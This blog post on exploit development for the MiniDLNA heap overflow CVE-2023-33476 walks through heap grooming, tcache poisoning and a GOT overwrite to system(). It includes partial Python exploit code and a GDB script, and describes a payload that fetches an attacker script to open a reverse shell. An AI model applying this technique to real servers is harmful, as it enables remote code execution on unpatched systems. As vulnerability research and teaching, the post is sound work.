Introduction

This is the second part of the two-part series covering a heap overflow I found in ReadyMedia MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going over the various challenges that had to be overcome and how everything was put together to achieve remote code execution and pop a shell. Check out part 1 for the root cause analysis of this bug.

Before diving into the details of the vulnerability and the exploit, it’s worth taking a moment to go over the basics of how chunked requests work and the fundamentals of the bug.

Disclaimer: this is a pretty long post and there may be a few details I might have missed, but I’ve tried to include as much as possible to help it all make sense and help others who are trying to learn. If you find any glaring issues/mistakes please reach out to let me know and I’ll add any corrections needed.

If you just care about the code, you can find it here.

review of HTTP chunked encoding

An HTTP request will set the Transfer-Encoding HTTP header to chunked to indicate to the server that the body of the request should be processed in chunks. The chunks follow a common encoding scheme: a header containing the size of the chunk (in hex) followed by the actual chunk data. As this is HTTP, the character sequence \r\n serves as delimiter bytes between chunk size headers and chunk data. The last chunk (terminator chunk) is always a zero-length chunk.

A typical request using chunked encoding will look something like this:

POST /somepath HTTP/1.1
Transfer-Encoding: chunked

4
AAAA
10
BBBBBBBBBBBBBBBB
0

The request above contains two chunks: one 4-byte chunk and one 16-byte chunk (chunk sizes are parsed as hex, so 10 means 16), followed by the zero-length terminator chunk. The server will parse the chunk sizes and use them to construct a single blob of data composed of the concatenated chunk data, minus the size metadata.
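To make the format concrete, here is a minimal Python sketch of the encoding and of what a well-behaved decoder does. It is only an illustration: the function names are mine, and it has nothing to do with how MiniDLNA implements this.

```python
def encode_chunked(chunks):
    """Encode an iterable of bytes objects as an HTTP chunked body."""
    out = bytearray()
    for data in chunks:
        if not data:
            continue  # a zero-length chunk would terminate the body early
        out += f"{len(data):x}".encode() + b"\r\n" + data + b"\r\n"
    out += b"0\r\n\r\n"  # zero-length terminator chunk
    return bytes(out)


def decode_chunked(body):
    """Decode a well-formed chunked body back into the concatenated data."""
    data = bytearray()
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end], 16)  # chunk sizes are hex
        if size == 0:
            return bytes(data)
        start = line_end + 2
        data += body[start:start + size]  # slicing never reads past the body
        pos = start + size + 2  # skip the CRLF that follows the chunk data


body = encode_chunked([b"AAAA", b"B" * 16])
print(body)
print(decode_chunked(body))
```

The important difference from the vulnerable code is that the slice in decode_chunked() can never reach beyond the bytes that were actually received.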

summary of the bug and initial primitive

Let’s review the fundamentals of the bug and the primitives provided. The relevant snippet of code that triggers the memory corruption as a result of the bug is shown below.

    char *chunkstart, *chunk, *endptr, *endbuf;

    // `chunk`, `endbuf`, and `chunkstart` all begin pointing to the start of the request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunk size parsed by strtol() above
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }

To recap the important details:

  • strtol() is used to parse the HTTP chunk size from the body of the request (which we fully control). The value returned by strtol() is saved to h->req_chunklen
  • h->req_chunklen is used as the size argument in a call to memmove() without bounds-checking
  • The dest and src arguments passed to memmove() are both offsets into the request buffer; in theory, they should point to the first digit of the chunk size and the first byte of the actual chunk data that follows the chunk size, respectively.
  • the request buffer containing our data is allocated on the heap

Due to the missing bounds-check in the code above (and the broken validation logic that is the root cause of the issue), the bug provides an OOB read/write primitive of arbitrary size. At this point, I still had almost no control over what gets written and where it’s written to. Since the corruption occurs on data allocated on the heap, this introduced the option to either attack the application data directly or target the heap metadata to derive more powerful primitives.
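The effect is easier to see in a toy model. The Python sketch below ports the loop to a bytearray that stands in for heap memory. It is a simplification under stated assumptions: strtol16() is my own rough stand-in for strtol() (it ignores signs and 0x prefixes), the CRLF search does not stop at NUL bytes the way strstr() does, and the "neighbor" bytes are just a label I made up for whatever sits after the request buffer.

```python
HEX_DIGITS = b"0123456789abcdefABCDEF"
WHITESPACE = b" \t\n\v\f\r"


def strtol16(mem, pos):
    """Simplified strtol(s, &end, 16): returns (value, end)."""
    i = pos
    while i < len(mem) and mem[i] in WHITESPACE:
        i += 1
    start = i
    while i < len(mem) and mem[i] in HEX_DIGITS:
        i += 1
    if i == start:
        return 0, pos  # nothing parsed: end stays at the starting position
    return int(mem[start:i], 16), i


def process_chunks(mem, body_off):
    """Port of the vulnerable loop; `mem` plays the role of the heap."""
    chunk = endbuf = body_off
    while True:
        size, endptr = strtol16(mem, chunk)
        if size <= 0 or endptr == chunk:
            break
        endptr = mem.find(b"\r\n", endptr)
        if endptr < 0:
            raise ValueError("no CRLF after chunk size (the server would send a 400)")
        endptr += 2
        assert endptr + size <= len(mem), "model memory too small"
        # memmove(endbuf, endptr, size): nothing checks that the range
        # endptr..endptr+size stays inside the request buffer
        mem[endbuf:endbuf + size] = mem[endptr:endptr + size]
        endbuf += size
        chunk = endptr + size
    return endbuf


request_body = b"10\r\nAAAA"  # claims 16 bytes of data but only carries 4
neighbor = b"<next-chunk>"     # stand-in for whatever follows on the heap
mem = bytearray(request_body + neighbor + bytes(16))
process_chunks(mem, 0)
print(bytes(mem[:len(request_body)]))
print(bytes(mem[len(request_body):len(request_body) + len(neighbor)]))
```

In the model, the region that belonged to the neighbor ends up holding a copy of its own bytes shifted 4 positions lower, which is the out-of-bounds read and write happening in a single memmove().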

Understanding the Corruption Mechanism

NOTE: all references to “chunks” in the sections below are referring to HTTP chunks, not heap chunks.

effects of memmove()

We’ll start with the detail that had the most impact on developing the exploit: the use of memmove() to concatenate the end of one HTTP chunk to the next. Each iteration through the while loop in the code snippet above is meant to process a single HTTP chunk from the body of the request; assuming multiple chunks are present (which is always the case for valid requests) the code needs to concatenate the beginning of the chunk it is processing to the tail end of the chunks that have already been processed and remove the chunk size metadata between them. The application does this in-line within the same buffer instead of creating a new allocation to hold the final blob of data; it selects the range of bytes pertaining to the current chunk being processed based on the chunk size it finds in the request and will then ‘left-shift’ those bytes x bytes lower in memory, where x is the total length of the chunk size field (i.e. strlen(chunk_size_line)).

In practical terms, this introduces the following conditions and constraints:

  • As we can only control the size and not the location of the r/w, we are only able to r/w higher into memory relative to the location of the chunk in the buffer allocated for the request
  • The number of bytes the data will be left-shifted by is determined by the distance between the dest and src args passed to memmove() (endbuf and endptr respectively in the snippet of the vulnerable code above)

visualizing the operation

This particular aspect of the bug and the impact it has on exploitation isn’t very intuitive (at least not to me) so it may be useful to try to visualize it. I created the graphic below using Google Sheets (lol) while working on the exploit to help me grok the details so I’m hoping it’s useful here.

The before and after rows below represent a contiguous chunk of memory containing the contents of an HTTP request before and after the memmove() operation using the chunk size at the beginning of the request data (23). We can imagine that the row of bytes is a ribbon on a fixed track; by “pulling” on the left side of the ribbon starting at read_src , we can shift the bytes to the left toward us (we’re fixed at write_dest). There isn’t a limit to how much data to the right of read_src we can shift left, but we can only shift by (read_src - write_dest) slots. The grid slots (i.e. addresses) are fixed, so if we want some payload to end up at a specific target address we need to be able to shift the bytes of that payload left by at least (target_addr - payload_addr).

To break it down:

  • The cells with the red border show the bytes that would be selected by a chunk size of 23 (as seen at the beginning of the row)
  • The location where memmove() will write the bytes to is highlighted in green (endbuf ptr passed as first arg)
  • The location where memmove() will start reading from is highlighted in purple (endptr ptr passed as the second arg)

memmove-viz-1.png

Extrapolating from the examples above, we can see that changing the chunk size alone will have virtually 0 impact on where the data is written relative to our target — larger sizes will reach further into memory but will result in those bytes being shifted by the same distance, which means for a given target at address x and payload data at x+20, selecting bytes up to x+20 or x+100 will result in the same bytes being written to x after the call to memmove().
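A quick way to convince yourself of this is to model memmove() on a flat buffer. This is just a sketch with made-up offsets (target at 10, payload at 30, so 20 bytes apart); shift_left() is a helper name I picked for the example.

```python
def shift_left(mem, dest, src, n):
    """Model memmove(mem + dest, mem + src, n) on a copy of `mem`."""
    out = bytearray(mem)
    out[dest:dest + n] = mem[src:src + n]
    return out


mem = bytearray(b"." * 64)
target, payload_at = 10, 30  # payload sits 20 bytes above the target
mem[payload_at:payload_at + 4] = b"PWND"

# Same shift distance (src - dest = 4), two different sizes:
small = shift_left(mem, dest=0, src=4, n=40)
large = shift_left(mem, dest=0, src=4, n=60)
print(small[target:target + 4], large[target:target + 4])

# Only changing the distance between dest and src moves the payload onto the target:
aligned = shift_left(mem, dest=0, src=20, n=40)
print(aligned[target:target + 4])
```

With a shift of 4 the payload lands at offset 26 no matter how many bytes are selected, so the target is untouched in both cases. Once src - dest equals the 20-byte gap, the payload lands exactly on the target.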

controlling the shift distance

As mentioned in the previous section, the distance the selected byte-range is shifted by is determined by the number of bytes between the pointer where the bytes will be written (endbuf) and the pointer where data will be read from (endptr). Based on the parsing logic, this ends up being the number of bytes between the first byte of the chunk size in the request body and the location where the first byte of actual chunk data is expected to be. In the code, this is done by passing a pointer &endptr as the second arg to strtol() when parsing the chunk size value from the request to have strtol() store the location of the first non-parsable value it encounters to this pointer. In a normal request, this would be the \r that comes immediately after the chunk size. The code checks for the presence of \r\n starting at the value saved to this pointer to confirm this sequence is in fact present and if found increments it by 2 to move it past those characters. The pointer would then presumably point to the start of the actual chunk data.

The relevant code is shown again here:

  while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
  {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        { ... }
        endptr += 2;

        memmove(endbuf, endptr, h->req_chunklen);
...

This means that in order to gain control over that distance, it’s necessary to introduce additional bytes between the two pointers without causing strtol() to stop parsing prematurely. Taking a look at the manpage for strtol(), the following line caught my attention:

The string may begin with an arbitrary amount of white space (as determined by isspace(3)). […] The remainder of the string is converted to a long value in the obvious manner, […]

By prepending the chunk size value with whitespace, it’s possible to introduce a nearly arbitrary number of bytes in order to affect the distance between endbuf and endptr when memmove() is called. Alternatively, prepending 0's to the chunk size achieves the same result.
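As a rough illustration, the Python snippet below shows that padding the size field changes its length but not its parsed value. Python's int() is used here only as a stand-in for strtol(), since it also ignores leading whitespace and leading zeros for these inputs; shift_distance() is a name I made up, and it assumes the size field is immediately followed by \r\n.

```python
def shift_distance(size_field):
    """Bytes between the start of the size field and the first byte of chunk data."""
    return len(size_field) + len(b"\r\n")


for size_field in (b"23", b" " * 7 + b"23", b"0" * 7 + b"23"):
    value = int(size_field, 16)  # parsed value is the same in all three cases
    print(repr(size_field), value, shift_distance(size_field))
```

All three fields parse to 0x23, but the two padded versions put 11 bytes between the write and read pointers instead of 4.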

example

This example shows a request where no leading whitespace has been added. At the first round of processing:

  • endbuf is at index/address 489
  • endptr is at index/address 493
  • Chunk size is 23, so 23 bytes will be shifted
  • (489 - 493 = -4), so each byte in the range of bytes to be shifted will shift -4 bytes down.
  • We want to overwrite 4 bytes starting at index 501 (cells highlighted in red)
  • The payload data we want to use for the overwrite starts at index 512 (cells highlighted in yellow)
  • Distance between overwrite target and overwrite data source is -11 bytes
  • The corruption does NOT successfully shift our overwrite data to the desired location

shift-viz-1.png

With the introduction of whitespaces prepended to the chunk size at the start of the request body:

  • endbuf is now at index 482
  • endptr is still at index 493
  • (482 - 493 = -11), so each byte in the range of bytes to be shifted will shift -11 bytes down.
  • We want to overwrite 4 bytes starting at index 501
  • The data we want to use for the overwrite starts at index 512
  • Distance between overwrite target and overwrite data source is still -11 bytes

shift-viz-2.png

Based on this, I concluded that it would be necessary to insert enough whitespace before the chunk size to make endbuf - endptr == overwrite_target - payload_data.
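The arithmetic can be sketched in a few lines of Python. The helper names are hypothetical, and the sketch assumes the size field is followed directly by \r\n and that spaces are used for the padding.

```python
def leading_whitespace_needed(target, payload, size_digits):
    """Padding bytes needed so that endptr - endbuf == payload - target."""
    distance = payload - target            # how far the payload must move left
    pad = distance - size_digits - 2       # minus the hex digits and the CRLF
    if pad < 0:
        raise ValueError("payload is too close to the target for this size field")
    return pad


def build_size_line(chunk_size, target, payload):
    """Return the padded chunk-size line, including the trailing CRLF."""
    digits = f"{chunk_size:x}"
    pad = leading_whitespace_needed(target, payload, len(digits))
    return b" " * pad + digits.encode() + b"\r\n"


# Numbers from the example above: target at index 501, payload at index 512
line = build_size_line(0x23, target=501, payload=512)
print(repr(line), len(line))
```

For the example above this gives 7 spaces, which matches endbuf moving from 489 to 482 while endptr stays at 493.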

heap-based corruption

The corruption occurs on heap-allocated data, so it’s possible to corrupt the metadata of neighboring heap chunks. Based on the conditions described so far, it’s actually impossible to avoid corrupting at least the chunk that is immediately next to ours. This is because for a minimal request containing no data in the chunk fields (such as the request provided as an example at the beginning of this post) the memmove() operation is going to be performed on data near the end of the allocated buffer, overflowing into the next chunk almost immediately. While this introduces additional attack surface and exploitation options, it also adds some limitations, namely the need to bypass Glibc security and sanity checks so as to avoid abort()ing before the exploit finishes or triggering some other crash.

Heap Feng Shui

NOTE: references to “chunks” below are referring to heap chunks now, not HTTP chunks.

Given the heap-allocated buffers, we’ll focus on exploiting the heap directly (i.e. targeting heap chunk metadata). Heap-based exploits typically benefit from (or outright require) achieving some level of control over the layout of the heap in order to get target objects and payload data allocated at predictable locations. Based on conditions described above, this would be absolutely necessary for a successful exploit in this case. Specifically, it would be necessary in order to meet these requirements:

  1. The target address for the overwrite target must be located higher in memory relative to where the request buffer used to trigger the corruption is located
  2. The payload data used to overwrite the target address must be located higher in memory relative to the target address

Based on these requirements, the ideal memory layout would look something like this:

0x2000
---
	.....................
	...request_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

For this theoretical layout, we would then provide a chunk size large enough to traverse the overwrite_target and reach the last byte of the payload_data.

In practice, to achieve the layout above it’s necessary to:

  • Have controlled data allocated to the heap
  • Prevent the allocations from being free()’d prematurely
  • Force allocations to happen sequentially or in a way that can be reliably predicted

controlling allocations

Unsurprisingly, the most straightforward way to force the application to make heap allocations with controlled data is by sending HTTP requests, so this can be used as an interface/proxy for malloc(). One important detail about this is that the request buffer allocations are done using realloc() rather than malloc() — requests that exceed 2048 bytes will result in the existing allocation being reallocated, which can affect the heap layout and result in heap chunks being freed unintentionally. We can avoid this issue entirely by keeping all requests below this size.

holding request allocations

The next requirement is almost more important than the first — the allocations containing our controlled data must remain allocated across multiple requests in order to successfully get the desired memory layout. This took a little bit of fiddling around but I eventually found an easy way to do this.

The code that handles the initial reading of the request data from the socket is shown below. After copying the data from the static buffer to the dynamically allocated buffer at h->req_buf, it searches for the presence of the sequence \r\n\r\n using strstr() to determine whether the entire contents of the HTTP headers have been received (the first occurrence of that sequence is expected to be the terminator for the headers).

        memcpy(h->req_buf + h->req_buflen, buf, n);
        // update req_buflen
        h->req_buflen += n;
        h->req_buf[h->req_buflen] = '\0';

        /* search for the string "\r\n\r\n" */
        // this is the mechanism used to determine where the end of the http
        // headers are since that should be the first occurrence of this string sequence
        // for a normal http request.
        endheaders = strstr(h->req_buf, "\r\n\r\n");

        if(endheaders)
        {
          h->req_contentoff = endheaders - h->req_buf + 4;
          h->req_contentlen = h->req_buflen - h->req_contentoff;
          ProcessHttpQuery_upnphttp(h);
        }

If this sequence is not found, the application will move on without entering the block where ProcessHttpQuery_upnphttp() is called above and wait for the client to send more data to complete the headers. This leaves the buffer at h->req_buf, containing up to the first 2048 bytes of data sent, allocated indefinitely until more data arrives on the socket or the connection is dropped by the client. By introducing a null byte anywhere before the first \r\n\r\n terminator in the request data sent, it’s possible to force strstr() to terminate early and not find those characters. Alternatively, not including the terminator sequence at all will also result in the application assuming the client has not yet sent all headers and holding the allocation. We can then free() any allocation made this way by closing the socket used to initiate it.
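As a minimal sketch of the second option, the Python helper below builds request data that never contains the header terminator. The function name, the X-Pad header, and the 0x58 length are all placeholders I chose for illustration; how the number of bytes sent maps to the size of the resulting allocation is not something this sketch tries to model.

```python
def build_held_request(total_len, path=b"/"):
    """Build header data with no CRLF CRLF terminator so the server keeps waiting."""
    if total_len >= 2048:
        raise ValueError("stay below 2048 bytes to avoid a realloc() of the buffer")
    head = b"POST " + path + b" HTTP/1.1\r\nX-Pad: "
    if total_len < len(head):
        raise ValueError("total_len is too small to hold the request line")
    data = head + b"A" * (total_len - len(head))
    # Sanity check: the end-of-headers marker must never appear
    assert b"\r\n\r\n" not in data
    return data


held = build_held_request(0x58)
print(len(held), held[:32])
```

Sending this on an open socket and then simply not closing it keeps the buffer alive; closing the socket later releases it.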

getting sequential allocations

With the two previous steps figured out, it was then possible to start influencing the heap layout with sufficient control to start working on getting the allocations made in a predictable way in order to eventually set things up in an ideal way for the exploit. The first step was to identify where heap allocations happen along the execution path for request processing, their sizes, and whether they contained any data that may be interesting to target. After a bit of code review I determined that, apart from the request buffer allocation (saved to h->req_buf), the only other relevant allocation that happens for each request is for a upnphttp structure, which stores the state, data, and metadata for the request being processed (saved to h). The pointer to the request buffer itself is stored inside the upnphttp structure.

I created the following GDB script to log every time either a request allocation or upnphttp struct allocation occurred and the addresses for the allocations.

set verbose off
gef config context.enable False

break upnphttp.c:1140
commands 1
    echo \n\n
    printf "============== Allocation for req_buf is at %p\n",h->req_buf
    echo \n\n
    printf "==============================================\n"
    continue
end

break upnphttp.c:118
commands 2
    echo \n\n
    printf "============== NEW upnphttp struct is at = %p\n",ret
    echo \n\n
    printf "==============================================\n"
    continue
end

run -R -f testing_tmp.conf -d

I wrote a Python script using raw sockets to start performing allocations for both the upnphttp structures and the request buffers and observing the addresses where the allocations occurred, using the method described in the previous section to keep the allocations held in memory across multiple requests. This took a bit of fiddling and playing with the order that connections were initiated in and when request buffers were allocated but I eventually found that after about 6-7 request buffer allocations (after having initiated the connections ahead of time) the buffers began getting allocated sequentially in memory.

separating the connection and request buffer allocations

Because the fields of the upnphttp structure are accessed throughout the code that handles request processing, it would be ideal to separate those allocations from the request buffer allocations so that the latter end up allocated sequentially, rather than having the upnphttp structures sandwiched between them. This can be accomplished by initiating the connections that will be needed before sending any data on the sockets — the upnphttp structures are allocated when the connection is received (in New_upnphttp(), called by ProcessListen() upon receiving a new connection) and will remain allocated as long as the connection is kept open, which allows us to send data asynchronously from when the connections are initiated.
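In Python, the "connect everything first, send later" ordering could look roughly like the sketch below. These helpers are hypothetical and written with the standard library only; they are not the helpers used in the actual exploit.

```python
import socket


def open_connections(count, host, port):
    """Open `count` TCP connections without sending any data on them yet."""
    socks = []
    for _ in range(count):
        socks.append(socket.create_connection((host, port)))
    return socks


def send_on_all(socks, data):
    """Send the same request data on every socket, in order."""
    for sock in socks:
        sock.sendall(data)


def close_all(socks):
    """Close sockets starting from the most recently opened one."""
    while socks:
        socks.pop().close()


# Usage idea (host and port are placeholders):
#   conns = open_connections(10, "192.168.1.10", 8200)  # connection structs allocated here
#   send_on_all(conns, held_request_bytes)               # request buffers allocated here
```

Splitting the two phases this way is what keeps the per-connection structures grouped together and away from the request buffers that get allocated afterwards.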

the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap

Taking another look at the ideal heap layout described above, here is what needs to be done to construct it using the techniques and information described so far:

  • Allocate the connection upnphttp structs that will be needed before sending any request data
  • Send request data on x of the allocated connections to reach the point where request buffer allocations start happening sequentially. The real ‘crafted heap’ starts here.
  • Send the request data for the request that will trigger the corruption (‘top’ of the crafted heap, at lower address)
  • Send request data to create another request buffer allocation of the same size as the previous one (the ‘middle’). Assume the overwrite target is the heap chunk metadata of this allocation.
  • Send the request containing the payload data that will be written to the target (‘bottom’ of the crafted heap, at higher address)

0x2000
---
	.....................
	...corrupt_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

As can be seen, the request that is used to trigger the corruption must be sent before allocating the other buffers to have it allocated at a lower address relative to the others. This is a bit of an issue because sending the actual corruption payload first would either trigger a crash prematurely at worst (preventing anything else from being done) or get processed and result in the buffer being free()’d at best. After spending some time learning about the Glibc malloc implementation and heap exploitation in general, I chose to address this issue by using a ‘placeholder’ allocation in the place where the corruption buffer would need to be; that allocation then gets free()’d immediately before sending the actual corruption request, after the crafted heap has been set up. By making this placeholder allocation the same size as the corruption request allocation (rounded up to the actual malloc chunk size), making an allocation of that size immediately after it’s free()’d results in the same chunk being returned by malloc(), because the allocator hands back the most recently free()’d chunk of a matching size first (its “first fit” behavior). This means that sending the actual corruption request after dropping the connection for the placeholder buffer (causing it to be free()’d) will result in the data for the corruption payload being allocated where we need it.
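The "rounded up to the actual malloc chunk size" part is worth spelling out. On 64-bit Glibc, the requested size gets 8 bytes of header overhead added and is rounded up to a multiple of 16, with a minimum chunk size of 32 bytes. The sketch below reproduces that rounding; the example request sizes are arbitrary and only there to show which requests end up with the same chunk size.

```python
SIZE_SZ = 8             # sizeof(size_t) on x86-64
MALLOC_ALIGN_MASK = 15  # 16-byte alignment
MINSIZE = 32            # smallest possible chunk


def chunk_size(request):
    """Chunk size Glibc uses for a malloc(request) on x86-64."""
    size = (request + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)


def same_bin(request_a, request_b):
    """True if both requests are served from the same size class."""
    return chunk_size(request_a) == chunk_size(request_b)


for req in (0x48, 0x49, 0x58, 0x59):
    print(hex(req), "->", hex(chunk_size(req)))
print(same_bin(0x49, 0x58))
```

So the placeholder and the corruption request do not need to be byte-for-byte the same length, they only need to round to the same chunk size.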

putting it all together

Having figured out everything covered in the previous sections, we now have everything we need to write an exploit. Before going into the meaty details, let’s take a moment to review. We can now:

  • Control when allocations (i.e. malloc calls) are made and control their size
  • Control when allocations are free()’d so we can keep buffers in place while we make other allocations
  • Have sufficient influence over the allocator to get it to start giving us allocations that are sequential in memory
  • Have the request buffer that will trigger the corruption allocated in an ideal location for exploitation

Exploit: Arbitrary R/W via Tcache Poisoning for RCE

Whew! That was a lot of background to cover but hopefully that will all help with making sense of the actual exploit. The sections below cover the specific exploit I wrote more directly, though I’ll avoid going into specifics like sizes and addresses since those are variable and not critical for understanding how the exploit works. The source code for the exploits has been heavily commented if you’re interested in more details.

The exploit performs a tcache poisoning attack in order to trick malloc into returning a pointer to an arbitrary location and achieve arbitrary read/write; it uses this to get a pointer to the Global Offset Table (GOT) and overwrite the entries for free() and fprintf() to point to system(). free() is targeted as it will be called for h->req_buf at the end of request handling, transforming the call from free(h->req_buf) to system(h->req_buf). The payload sent for the final allocation where the GOT is corrupted begins with a shell command that will download and execute a script from an attacker-controlled server and spawn a reverse shell.

setup: building the target

The exploit is written for a binary with only partial RELRO and no PIE; the address of system() in libc and the address of the GOT are assumed to be known. The binary is built on a Debian 11 VM using Glibc 2.31 (default version installed by OS).

# install deps
sudo apt install -y autoconf autopoint libavformat-dev libjpeg-dev libsqlite3-dev \
  libexif-dev libogg-dev libvorbis-dev libid3tag0-dev libflac-dev

git clone https://git.code.sf.net/p/minidlna/git minidlna-git
cd minidlna-git && git checkout tags/v1_3_2
./autogen.sh
./configure --enable-tivo CC=clang CFLAGS="-g -O0 -fstack-protector"
make minidlnad CC=clang CFLAGS="-g -O0 -fstack-protector"

This is the output of the checksec tool for the output binary:

-> % checksec ./minidlnad
[*] '/home/hyper/minidlna-1.3.2/minidlnad'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The server can be started using the following command:

sudo ./minidlnad -R -f minidlna.conf -d

tcache poisoning tl;dr

I’ll assume you have some background on heap exploit techniques so won’t go super in-depth here but if not I highly recommend the how2heap series on Github. It covers basically every known technique and has up-to-date examples for the latest Glibc versions. The explanation given below applies to Glibc ≤2.31; newer versions have some additional constraints and checks that will need to be bypassed.

At a high-level, a tcache poisoning attack abuses the behavior of the Glibc malloc implementation and how the tcache (per-thread free bins) entries are handled in order to trick the allocator into returning a pointer to an arbitrary location. The tcache uses bins with predefined sizes and inserts chunks into the appropriate bin based on a matching size. Chunks are inserted into the tcache bins in a LIFO manner and since the allocator doesn’t need to traverse the list of free chunks in both directions, it only keeps a singly-linked list using the fd fields of the free()’d chunks to keep track of them. By corrupting the fd pointer of a free’d chunk in a tcache bin for a given size, a subsequent call to malloc() for that size will result in the allocator returning the chunk pointed to by fd.
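If that’s hard to picture, here is a toy model of a single tcache bin in Python. It is a deliberately simplified sketch: memory is a dict mapping a chunk address to its fd value, the addresses are made up, and none of the real allocator’s checks are modeled beyond the per-bin count.

```python
class ToyTcacheBin:
    """Toy model of one tcache bin: a LIFO singly-linked list threaded through fd."""

    def __init__(self, memory):
        self.memory = memory  # chunk address -> value stored in its fd field
        self.head = 0
        self.count = 0

    def free(self, addr):
        self.memory[addr] = self.head  # fd points at the previous head
        self.head = addr
        self.count += 1

    def malloc(self):
        if self.count == 0:
            raise MemoryError("bin is empty")
        addr = self.head
        self.head = self.memory.get(addr, 0)  # follow fd without validating it
        self.count -= 1
        return addr


memory = {}
tbin = ToyTcacheBin(memory)
chunk_a, chunk_b = 0x2000, 0x2060  # hypothetical heap addresses
TARGET = 0x41414140                # hypothetical address we want malloc() to return

tbin.free(chunk_b)
tbin.free(chunk_a)        # bin: chunk_a -> chunk_b
memory[chunk_a] = TARGET  # the corruption: overwrite fd of a free'd chunk

first = tbin.malloc()     # returns chunk_a and makes TARGET the new head
second = tbin.malloc()    # returns TARGET
print(hex(first), hex(second))
```

The second allocation comes back pointing at TARGET even though that address was never a heap chunk, which is the whole trick.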

constructing the fake chunk for poisoning

Based on what’s needed for the tcache poisoning to work, we need to corrupt a heap chunk that’s already been free’d and this chunk needs to be located after the request buffer containing the payload that will trigger the corruption. The chunk that will be targeted is a request buffer, so we control its contents and can place the payload data we want written to the target location (the fd pointer) within it. One important thing to note is that because we free the chunk before corrupting it, the first 16 bytes of the data we send will be overwritten by free() to store the fd and bk pointers (though technically only the fd pointer is actually used by tcache), so the payload data sent is placed at +16-byte offset into the buffer to avoid it being corrupted before we copy it over the target location.

The illustration below shows how this chunk would look before and after being free’d, with return_addr at the right offset to ensure it’s left intact.
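The same before/after view can be sketched in Python using only the standard library. Everything concrete here is an assumption for illustration: the target address, the 0x58 buffer size, and the two 8-byte values that the simulated free() writes over the start of the buffer.

```python
import struct


def build_fake_chunk(target_addr, alloc_size, filler=b"\x11"):
    """16 bytes of sacrificial padding, then the 8-byte little-endian target address."""
    body = filler * 16 + struct.pack("<Q", target_addr)
    return body.ljust(alloc_size, filler)


def simulate_free(user_data, first_qword, second_qword):
    """Model free() clobbering the first 16 bytes of the chunk's user data."""
    return struct.pack("<QQ", first_qword, second_qword) + user_data[16:]


TARGET_ADDR = 0x404018  # hypothetical address
before = build_fake_chunk(TARGET_ADDR, 0x58)
after = simulate_free(before, 0x1234000, 0x1230010)  # made-up allocator values

print(before[:24].hex())
print(after[:24].hex())
```

The first 16 bytes change across the free(), but the 8 bytes at offset 16 are identical in both dumps, so the address is still available to be slid over fd later.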

fake-chunk-1.png

heap preparation

The first step taken is to use the techniques described earlier in the post to set the heap up so that we can get allocations created sequentially and spray the fake chunks described in the previous section into those allocations to use them later.

    # * the socks at the end of this list should all be right next to each other
    # * we'll free these LIFO from the tail to ensure our next allocs for the corruption 
    #   will come from those sequential chunks. we need at least 2-3 sequential chunks so we use
    #   a total of 10 allocations here

    # create and connect needed sockets before sending any data on any of them. This should
    # keep the allocations for the upnphttp structs separate from the request buffer allocations.
    GROOMING_ALLOCS = 10
    xpr(f"starting heap grooming round, using {GROOMING_ALLOCS} allocs...")
    dummies = create_sockets(GROOMING_ALLOCS)
    connect_sockets(dummies, server_ip, server_port)

    # This is the target address we want malloc to return after the chunk has been corrupted
    where = pwn.pack(target_addr, 64)

    # create the fake chunk described above. pad with 16 bytes to skip the first 2 8-byte fields
    # (fd, bk)
    pre_pad = b"\x11" * 16 # \x11 is arbitrary
    core = pre_pad + where

    # pad the end of the payload with enough bytes to meet the size needed for the target tcache bin
    # allocations need to be kept the same size because tcache bins must match exact sizes
    payload = pad(ALLOC_SIZE, core)

    # send the payload on all of the sockets we opened; this should result in 10 request buffer allocations;
    # the last 3-4 will be allocated sequentially.
    sendsocks(dummies, payload)

    # free the last 4 allocs we made in reverse order to add those chunks to the tcache bin for the matching size
    # so they're returned to us on the next allocations we make of the same size. by closing the sockets, we free
    # both the upnphttp structs and the request buffers they contain.
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()

After this code runs and the last few allocations are dropped, those free’d chunks should look something like this in memory and should be in the tcache bin for the matching size (0x60):

fake-chunk-2.png

poisoning the free’d chunk

Immediately after setting up the heap, the exploit then initiates a connection for the request that will be used to trigger the bug and corrupt the neighboring free’d chunk. The payload used to trigger the corruption is padded to match the size of the chunks we just free’d in the previous step so when the allocation is made, malloc() will return the last chunk that was inserted into the bin. Because the allocations were free’d in reverse order, the last chunk that was inserted into the corresponding tcache bin will be the top chunk shown in the illustration above (at the lower addresses), so that’s the chunk we’ll get back.

Assuming everything is set up correctly, the chunk for the corruption request and the target chunk will then look like this (the buffer containing the corruption payload highlighted in green). As can be seen, things are now set up in such a way that we should be able to use the OOB read to read past the end of the buffer containing the corruption payload and into the free’d chunk immediately after it. The free’d chunks still contain the return address payload we want to have written over the fd pointer of the same chunk, so we should be able to reach return_addr with the call to memmove() since we have full control over the len argument.

fake-chunk-3.png

